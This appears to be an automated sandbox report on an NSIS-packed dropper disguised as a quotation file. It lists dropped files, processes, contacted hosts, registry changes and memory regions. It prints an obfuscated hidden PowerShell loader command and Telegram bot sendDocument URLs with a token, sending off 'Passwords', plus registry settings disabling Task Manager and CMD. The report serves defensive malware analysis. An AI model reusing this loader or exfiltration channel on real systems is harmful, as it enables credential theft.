Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
November Quotation.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv
|
ASCII text, with very long lines (4175), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nowsgee.nlq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gmql3cy.yvc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a25gc0c.ol3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3jwlvlg.aeq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Copyboy.Mar
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\sammenpressede.all
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\squamae.com
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\subcause.txt
|
ASCII text, with very long lines (420), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Indspilningers.ear
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\Kropsdoven226.rag
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\sognenes\iconograph\kronvildtjagternes.end
|
data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\November Quotation.exe
|
"C:\Users\user\Desktop\November Quotation.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity)
"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://checkip.dyndns.org/8&h5
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
https://translate.google.com/translate_a/element.js
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://checkip.dyndns.org/1&
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.75
|
172.67.177.134
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://crl.mi
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://api.telegram.org/bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283
|
unknown
|
||
|
http://checkip.dyndns.org/
|
193.122.130.0
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://api.telegram.org/bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75
|
149.154.167.220
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
172.217.19.174
|
||
|
drive.usercontent.google.com
|
142.250.181.1
|
||
|
reallyfreegeoip.org
|
172.67.177.134
|
||
|
s-part-0035.t-0009.t-msedge.net
|
13.107.246.63
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
checkip.dyndns.com
|
193.122.130.0
|
||
|
checkip.dyndns.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
142.250.181.1
|
drive.usercontent.google.com
|
United States
|
||
|
193.122.130.0
|
checkip.dyndns.com
|
United States
|
||
|
172.217.19.174
|
drive.google.com
|
United States
|
||
|
172.67.177.134
|
reallyfreegeoip.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
DisableTaskMgr
|
|
|
|
HKEY_CURRENT_USER\Flyvestationers\Uninstall\aerograms\lunterne
|
nonintrospectively
|
||
|
HKEY_CURRENT_USER\ophiophagus\Fugacious\indsvbende
|
lakfernisernes
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System
|
DisableCMD
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
24112000
|
trusted library allocation
|
page read and write
|
|
|
|
5439000
|
remote allocation
|
page execute and read and write
|
|
|
|
A569000
|
direct allocation
|
page execute and read and write
|
|
|
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
4B5C000
|
stack
|
page read and write
|
||
|
BBC000
|
heap
|
page read and write
|
||
|
29A0000
|
trusted library allocation
|
page read and write
|
||
|
4CD0000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
heap
|
page readonly
|
||
|
8420000
|
trusted library allocation
|
page read and write
|
||
|
23E30000
|
remote allocation
|
page read and write
|
||
|
9169000
|
direct allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page execute and read and write
|
||
|
4C69000
|
heap
|
page read and write
|
||
|
8620000
|
heap
|
page read and write
|
||
|
6D45000
|
heap
|
page execute and read and write
|
||
|
2612E000
|
stack
|
page read and write
|
||
|
23F70000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
24020000
|
trusted library allocation
|
page read and write
|
||
|
264BE000
|
stack
|
page read and write
|
||
|
72B5000
|
heap
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
5C79000
|
trusted library allocation
|
page read and write
|
||
|
7024000
|
heap
|
page read and write
|
||
|
8610000
|
direct allocation
|
page read and write
|
||
|
23F80000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
86E6000
|
heap
|
page read and write
|
||
|
8689000
|
heap
|
page read and write
|
||
|
29B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7280000
|
heap
|
page execute and read and write
|
||
|
23B9F000
|
stack
|
page read and write
|
||
|
24171000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23FCE000
|
stack
|
page read and write
|
||
|
24010000
|
heap
|
page execute and read and write
|
||
|
29F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
2647E000
|
stack
|
page read and write
|
||
|
26EEE000
|
stack
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
2F0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
2619D000
|
trusted library allocation
|
page read and write
|
||
|
6E40000
|
direct allocation
|
page read and write
|
||
|
264C0000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
236E0000
|
direct allocation
|
page read and write
|
||
|
86A0000
|
heap
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
24266000
|
trusted library allocation
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
264D0000
|
trusted library allocation
|
page read and write
|
||
|
82A5000
|
trusted library allocation
|
page read and write
|
||
|
26368000
|
heap
|
page read and write
|
||
|
465000
|
unkown
|
page readonly
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
8656000
|
heap
|
page read and write
|
||
|
29D2000
|
trusted library allocation
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
4C71000
|
trusted library allocation
|
page read and write
|
||
|
75B000
|
heap
|
page read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
24040000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
4DC6000
|
trusted library allocation
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
2EB0000
|
trusted library section
|
page read and write
|
||
|
85A9000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
7277000
|
trusted library allocation
|
page read and write
|
||
|
23740000
|
direct allocation
|
page read and write
|
||
|
72A000
|
heap
|
page read and write
|
||
|
8430000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
2638F000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
25051000
|
trusted library allocation
|
page read and write
|
||
|
7342000
|
heap
|
page read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
29E2000
|
trusted library allocation
|
page read and write
|
||
|
29D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
240BD000
|
trusted library allocation
|
page read and write
|
||
|
8260000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
86A3000
|
heap
|
page read and write
|
||
|
8F8D000
|
stack
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
2639A000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
24263000
|
trusted library allocation
|
page read and write
|
||
|
23730000
|
direct allocation
|
page read and write
|
||
|
821D000
|
stack
|
page read and write
|
||
|
23D0E000
|
stack
|
page read and write
|
||
|
23D8E000
|
stack
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
23CC0000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
29B0000
|
trusted library allocation
|
page read and write
|
||
|
23E30000
|
remote allocation
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
7034000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
8FC0000
|
direct allocation
|
page execute and read and write
|
||
|
2FC7000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library allocation
|
page read and write
|
||
|
264D0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23F57000
|
stack
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
2682E000
|
stack
|
page read and write
|
||
|
869A000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2F15000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
263AA000
|
heap
|
page read and write
|
||
|
242D0000
|
trusted library allocation
|
page read and write
|
||
|
268A0000
|
trusted library allocation
|
page read and write
|
||
|
7FAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
23EAF000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
5E39000
|
remote allocation
|
page execute and read and write
|
||
|
86DD000
|
heap
|
page read and write
|
||
|
264E0000
|
heap
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
240FC000
|
trusted library allocation
|
page read and write
|
||
|
77CB000
|
stack
|
page read and write
|
||
|
734E000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8590000
|
heap
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
84BE000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
24155000
|
trusted library allocation
|
page read and write
|
||
|
857A000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
2F12000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
24169000
|
trusted library allocation
|
page read and write
|
||
|
26870000
|
trusted library allocation
|
page read and write
|
||
|
23D4F000
|
stack
|
page read and write
|
||
|
6839000
|
remote allocation
|
page execute and read and write
|
||
|
A98000
|
stack
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
C369000
|
direct allocation
|
page execute and read and write
|
||
|
768D000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
direct allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8572000
|
heap
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
2416D000
|
trusted library allocation
|
page read and write
|
||
|
3E90000
|
remote allocation
|
page execute and read and write
|
||
|
76B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
84C7000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
24051000
|
trusted library allocation
|
page read and write
|
||
|
2617B000
|
trusted library allocation
|
page read and write
|
||
|
BB1000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
23750000
|
direct allocation
|
page read and write
|
||
|
26237000
|
trusted library allocation
|
page read and write
|
||
|
23AF000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8670000
|
heap
|
page read and write
|
||
|
23B00000
|
heap
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
6E30000
|
direct allocation
|
page read and write
|
||
|
4A39000
|
remote allocation
|
page execute and read and write
|
||
|
6D40000
|
heap
|
page execute and read and write
|
||
|
86A4000
|
heap
|
page read and write
|
||
|
24179000
|
trusted library allocation
|
page read and write
|
||
|
3037000
|
heap
|
page read and write
|
||
|
43A000
|
unkown
|
page read and write
|
||
|
261A2000
|
trusted library allocation
|
page read and write
|
||
|
26240000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
85D3000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
72C5000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
859D000
|
heap
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
4C2E000
|
stack
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
73A1000
|
heap
|
page read and write
|
||
|
26880000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
869C000
|
heap
|
page read and write
|
||
|
24130000
|
trusted library allocation
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B6000
|
trusted library allocation
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
86EE000
|
heap
|
page read and write
|
||
|
264C0000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
26870000
|
trusted library allocation
|
page read and write
|
||
|
B69000
|
heap
|
page read and write
|
||
|
754E000
|
stack
|
page read and write
|
||
|
59E000
|
stack
|
page read and write
|
||
|
8435000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
2417D000
|
trusted library allocation
|
page read and write
|
||
|
26396000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
29E0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2EE4000
|
trusted library allocation
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
242EC000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
24161000
|
trusted library allocation
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
6DE0000
|
direct allocation
|
page read and write
|
||
|
91F000
|
stack
|
page read and write
|
||
|
23780000
|
direct allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page execute and read and write
|
||
|
868A000
|
heap
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
24175000
|
trusted library allocation
|
page read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
84B0000
|
heap
|
page read and write
|
||
|
23C5E000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
6AF000
|
stack
|
page read and write
|
||
|
461000
|
unkown
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
8609000
|
heap
|
page read and write
|
||
|
4039000
|
remote allocation
|
page execute and read and write
|
||
|
29BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
heap
|
page read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
2EE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
242E0000
|
trusted library allocation
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
7FAC8000
|
trusted library allocation
|
page execute and read and write
|
||
|
436000
|
unkown
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23F60000
|
trusted library allocation
|
page read and write
|
||
|
85A5000
|
heap
|
page read and write
|
||
|
240B4000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
847E000
|
stack
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23720000
|
direct allocation
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2617E000
|
trusted library allocation
|
page read and write
|
||
|
CA6000
|
heap
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
23700000
|
direct allocation
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
22A5000
|
heap
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
29DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E10000
|
direct allocation
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
heap
|
page readonly
|
||
|
6CEB000
|
stack
|
page read and write
|
||
|
C6E000
|
stack
|
page read and write
|
||
|
2EF9000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
26221000
|
trusted library allocation
|
page read and write
|
||
|
86E7000
|
heap
|
page read and write
|
||
|
26176000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
266BE000
|
stack
|
page read and write
|
||
|
85A1000
|
heap
|
page read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
86E9000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26870000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
heap
|
page read and write
|
||
|
84F7000
|
heap
|
page read and write
|
||
|
862A000
|
heap
|
page read and write
|
||
|
268A0000
|
trusted library allocation
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23F1A000
|
stack
|
page read and write
|
||
|
26365000
|
heap
|
page read and write
|
||
|
23770000
|
direct allocation
|
page read and write
|
||
|
72E000
|
heap
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
242E8000
|
trusted library allocation
|
page read and write
|
||
|
869E000
|
heap
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2EED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2643E000
|
stack
|
page read and write
|
||
|
7239000
|
remote allocation
|
page execute and read and write
|
||
|
86E0000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26191000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
8154000
|
stack
|
page read and write
|
||
|
5C71000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2618E000
|
trusted library allocation
|
page read and write
|
||
|
6E20000
|
direct allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
5E1C000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
heap
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
6E00000
|
direct allocation
|
page read and write
|
||
|
AF69000
|
direct allocation
|
page execute and read and write
|
||
|
2637A000
|
heap
|
page read and write
|
||
|
2618A000
|
trusted library allocation
|
page read and write
|
||
|
85F3000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23E6E000
|
stack
|
page read and write
|
||
|
E3E000
|
stack
|
page read and write
|
||
|
2410E000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
29B4000
|
trusted library allocation
|
page read and write
|
||
|
2415D000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
264C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26196000
|
trusted library allocation
|
page read and write
|
||
|
2430000
|
heap
|
